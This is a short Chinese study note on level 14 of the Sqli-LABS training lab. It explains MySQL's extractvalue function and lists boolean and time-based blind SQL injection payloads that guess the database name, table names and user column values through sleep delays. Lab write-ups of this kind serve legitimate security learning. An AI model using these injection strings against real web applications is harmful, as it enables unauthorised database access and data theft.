Sqli-LABS通关笔录-14

这一节让我学习到了

1.extractvalue函数（该函数用于对xml文件进行查询和修改，于此相关的还有一个叫“updatexml”函数）

语法：extractvalue(XML_document, XPath_string); 
　　　　第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc
　　　　第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。

　　　　作用：从目标XML中返回包含所查询值的字符串

关于该函数的介绍使用：http://www.blogjava.net/chenpengyi/archive/2006/07/11/57578.html

2.

Payload:

admin" and 1=1#

这题方法也是要用盲注。

------------------------------------------------------------------------------------------------

延时Payload:

猜数据库：admin" and if(ascii(substring(database(),1,1))=115,sleep(10),1)--+

猜表：admin" AND if(ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>1,sleep(20),1)# 

猜列明：admin" AND if(ascii(substr((select username from security.users order by id limit 0,1),2,1))=117,sleep(10),1)#

------------------------------------------------------------------------------------------------

THE END

---